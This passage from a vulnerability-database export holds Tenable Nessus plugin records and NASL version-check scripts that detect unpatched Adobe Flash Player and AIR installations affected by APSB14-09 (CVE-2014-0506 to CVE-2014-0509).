value:\"2014/04/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n# < 13.0.0.182\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n (\n iver[0] < 13 ||\n (\n iver[0] == 13 &&\n (\n (iver[1] == 0 && iver[2] == 0 && iver[3] < 182)\n )\n )\n )\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 13.0.0.182\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n # XSS\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:33", "description": "Versions of Adobe AIR prior to 13.0.0.83 are unpatched for the following vulnerabilities :\n\n - A use-after-free error exists that could lead to arbitrary code execution. (CVE-2014-0506)\n - A buffer overflow error exists that could lead to arbitrary code execution. (CVE-2014-0507)\n - An unspecified error exists that could allow a security bypass leading to information disclosure. (CVE-2014-0508)\n - An unspecified error exists that could allow cross-site scripting attacks. (CVE-2014-0509)", "cvss3": {}, "published": "2015-07-10T00:00:00", "type": "nessus", "title": "Adobe AIR < 13.0.0.83 Multiple Vulnerabilities (APSB14-09)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "8809.PRM", "href": "https://www.tenable.com/plugins/nnm/8809", "sourceData": "Binary data 8809.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:24", "description": "According to its version, the instance of Flash Player installed on the remote Mac OS X host is equal or prior to 11.7.700.272 / 11.8.x / 11.9.x / 12.0.0.77. It is, therefore, potentially affected by multiple vulnerabilities :\n\n - A use-after-free error exists that could lead to arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to arbitrary code execution. (CVE-2014-0507)\n\n - An unspecified error exists that could allow a security bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross- site scripting attacks. (CVE-2014-0509)", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "nessus", "title": "Flash Player for Mac <= 11.7.700.272 / 12.0.0.77 Multiple Vulnerabilities (APSB14-09) (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_13_0_0_182.NASL", "href": "https://www.tenable.com/plugins/nessus/73435", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73435);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\n \"CVE-2014-0506\",\n \"CVE-2014-0507\",\n \"CVE-2014-0508\",\n \"CVE-2014-0509\"\n );\n script_bugtraq_id(\n 66208,\n 66699,\n 66701,\n 66703\n );\n\n script_name(english:\"Flash Player for Mac <= 11.7.700.272 / 12.0.0.77 Multiple Vulnerabilities (APSB14-09) (Mac OS X)\");\n script_summary(english:\"Checks version of Flash Player\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Flash Player installed on\nthe remote Mac OS X host is equal or prior to 11.7.700.272 / 11.8.x /\n11.9.x / 12.0.0.77. It is, therefore, potentially affected by multiple\nvulnerabilities :\n\n - A use-after-free error exists that could lead to\n arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to\n arbitrary code execution. (CVE-2014-0507)\n\n - An unspecified error exists that could allow a security\n bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross-\n site scripting attacks. (CVE-2014-0509)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 11.7.700.275 / 13.0.0.182 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0506\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\nextended_cutoff_version = \"11.7.700.272\";\nextended_fixed_version = \"11.7.700.275\";\n\nstandard_cutoff_version = \"12.0.0.77\";\nstandard_fixed_version = \"13.0.0.182\";\n\nfixed_version_for_report = NULL;\n\nif (version =~ \"^([0-9]|10)\\.|^11\\.[0-6]\")\n fixed_version_for_report = extended_fixed_version;\n\nelse if (\n version =~ \"^11\\.7\\.\" &&\n ver_compare(ver:version, fix:extended_cutoff_version, strict:FALSE) <= 0\n) fixed_version_for_report = extended_fixed_version;\n\nelse if (version =~ \"^11\\.[89]\\.\") fixed_version_for_report = standard_fixed_version;\nelse if (\n version =~ \"^12\\.0\\.0\\.\" &&\n ver_compare(ver:version, fix:standard_cutoff_version, strict:FALSE) <= 0\n) fixed_version_for_report = standard_fixed_version;\n\nif (!isnull(fixed_version_for_report))\n{\n # XSS\n set_kb_item(name:'www/0/XSS', value: TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:06", "description": "This flash-player update fixes several security issues :\n\n - bnc#872692: Security update to 11.2.202.350 :\n\n - APSB14-09, CVE-2014-0506, CVE-2014-0507, CVE-2014-0508, CVE-2014-0509", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2014:0549-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-307.NASL", "href": "https://www.tenable.com/plugins/nessus/75328", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-307.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75328);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0506\", \"CVE-2014-0507\", \"CVE-2014-0508\", \"CVE-2014-0509\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2014:0549-1)\");\n script_summary(english:\"Check for the openSUSE-2014-307 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This flash-player update fixes several security issues :\n\n - bnc#872692: Security update to 11.2.202.350 :\n\n - APSB14-09, CVE-2014-0506, CVE-2014-0507, CVE-2014-0508,\n CVE-2014-0509\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=872692\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-04/msg00050.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-11.2.202.350-2.68.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-gnome-11.2.202.350-2.68.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-kde4-11.2.202.350-2.68.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.350-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.350-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.350-42.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:33", "description": "Adobe flash-player has been updated to version 11.2.202.350 to resolve security issues and bugs. More information can be found at\n\nhttp://helpx.adobe.com/security/products/flash-player/apsb14-09.html\n\nThe following security issues have been fixed :\n\n - a use-after-free vulnerability that could have resulted in arbitrary code execution. (CVE-2014-0506)\n\n - a buffer overflow vulnerability that could have resulted in arbitrary code execution. (CVE-2014-0507)\n\n - a security bypass vulnerability that could have lead to information disclosure. (CVE-2014-0508)\n\n - a cross-site scripting vulnerability. (CVE-2014-0509)", "cvss3": {}, "published": "2014-04-17T00:00:00", "type": "nessus", "title": "SuSE 11.3 Security Update : flash-player (SAT Patch Number 9120)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:flash-player", "p-cpe:/a:novell:suse_linux:11:flash-player-gnome", "p-cpe:/a:novell:suse_linux:11:flash-player-kde4", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_FLASH-PLAYER-140411.NASL", "href": "https://www.tenable.com/plugins/nessus/73591", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73591);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0506\", \"CVE-2014-0507\", \"CVE-2014-0508\", \"CVE-2014-0509\");\n\n script_name(english:\"SuSE 11.3 Security Update : flash-player (SAT Patch Number 9120)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe flash-player has been updated to version 11.2.202.350 to resolve\nsecurity issues and bugs. More information can be found at\n\nhttp://helpx.adobe.com/security/products/flash-player/apsb14-09.html\n\nThe following security issues have been fixed :\n\n - a use-after-free vulnerability that could have resulted\n in arbitrary code execution. (CVE-2014-0506)\n\n - a buffer overflow vulnerability that could have resulted\n in arbitrary code execution. (CVE-2014-0507)\n\n - a security bypass vulnerability that could have lead to\n information disclosure. (CVE-2014-0508)\n\n - a cross-site scripting vulnerability. (CVE-2014-0509)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=872692\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0506.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0507.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0508.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0509.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9120.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-11.2.202.350-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.350-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.350-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-11.2.202.350-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.350-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.350-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:33", "description": "Versions of Adobe Flash player prior to 11.7.700.275 / 13.0.0.182 are outdated and thus unpatched for the following vulnerabilities :\n\n - A use-after-free error affects the handling of ExternalInterface. With a specially crafted flash object, a context-dependent attacker can dereference already freed memory and potentially execute arbitrary code. (CVE-2014-0506)\n - An overflow condition exists which is triggered as user-supplied input is not properly validated when handling ActionScript regular expressions. This may allow a context-dependent attacker to cause a stack-based buffer overflow, resulting in a denial of service or potentially allowing the execution of arbitrary code. (CVE-2014-0507)\n - An unspecified flaw that may allow a context-dependent attacker to bypass security restrictions and gain access to potentially sensitive information. (CVE-2014-0508)\n - A flaw exists that allows a cross-site scripting (XSS) attack. This flaw exists because the applications do not validate input passed to the 'ExternalInterface.call()' function before returning it to users. This may allow a context-dependent attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. (CVE-2014-0509)", "cvss3": {}, "published": "2015-07-10T00:00:00", "type": "nessus", "title": "Flash Player < 11.7.700.275 / 13.0.0.182 Multiple Vulnerabilities (APSB14-09)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "8806.PRM", "href": "https://www.tenable.com/plugins/nnm/8806", "sourceData": "Binary data 8806.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:31", "description": "According to its version, the instance of Flash Player installed on the remote Windows host is equal or prior to 11.7.700.272 / 11.8.x / 11.9.x / 12.0.0.77. It is, therefore, potentially affected multiple vulnerabilities :\n\n - A use-after-free error exists that could lead to arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to arbitrary code execution. (CVE-2014-0507)\n\n - An unspecified error exists that could allow a security bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross- site scripting attacks. (CVE-2014-0509)", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "nessus", "title": "Flash Player <= 11.7.700.272 / 12.0.0.77 Multiple Vulnerabilities (APSB14-09)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB14-09.NASL", "href": "https://www.tenable.com/plugins/nessus/73433", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73433);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-0506\",\n \"CVE-2014-0507\",\n \"CVE-2014-0508\",\n \"CVE-2014-0509\"\n );\n script_bugtraq_id(\n 66208,\n 66699,\n 66701,\n 66703\n );\n\n script_name(english:\"Flash Player <= 11.7.700.272 / 12.0.0.77 Multiple Vulnerabilities (APSB14-09)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Flash Player installed on\nthe remote Windows host is equal or prior to 11.7.700.272 / 11.8.x /\n11.9.x / 12.0.0.77. It is, therefore, potentially affected multiple\nvulnerabilities :\n\n - A use-after-free error exists that could lead to\n arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to\n arbitrary code execution. (CVE-2014-0507)\n\n - An unspecified error exists that could allow a security\n bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross-\n site scripting attacks. (CVE-2014-0509)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/531839/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 11.7.700.275 / 13.0.0.182 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0506\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (make_list(\"Plugin\", \"ActiveX\", \"Chrome\", \"Chrome_Pepper\"))\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n if (!isnull(vers) && !isnull(files))\n {\n foreach key (keys(vers))\n {\n ver = vers[key];\n\n if (ver)\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n if (\n (\n # Chrome Flash <= 12.0.0.77\n variant == \"Chrome_Pepper\" &&\n (iver[0] == 12 && iver[1] == 0 && iver[2] == 0 && iver[3] <= 77)\n ) ||\n (variant != \"Chrome_Pepper\" &&\n (\n # < 11\n iver[0] < 11 ||\n # 11.x <= 11.7.700.272\n (\n iver[0] == 11 &&\n (\n iver[1] < 7 ||\n (\n iver[1] == 7 &&\n (\n iver[2] < 700 ||\n (iver[2] == 700 && iver[3] <= 272)\n )\n )\n )\n ) ||\n # 11.8.x\n (iver[0] == 11 && iver[1] == 8) ||\n # 11.9.x\n (iver[0] == 11 && iver[1] == 9) ||\n\n # 12.0.0.x <= 12.0.0.77\n (\n iver[0] == 12 &&\n (\n iver[1] == 0 &&\n (\n iver[2] == 0 &&\n (\n iver[3] <= 77\n )\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product: Browser Plugin (for Firefox / Netscape / Opera)';\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 13.0.0.182 (Chrome PepperFlash)';\n else\n {\n if (ver =~ \"^11\\.7\")\n fix = \"11.7.700.275\";\n else\n fix = \"13.0.0.182\";\n info += '\\n Fixed version : '+fix;\n }\n info += '\\n';\n }\n }\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n # XSS\n set_kb_item(name:'www/'+port+'/XSS', value: 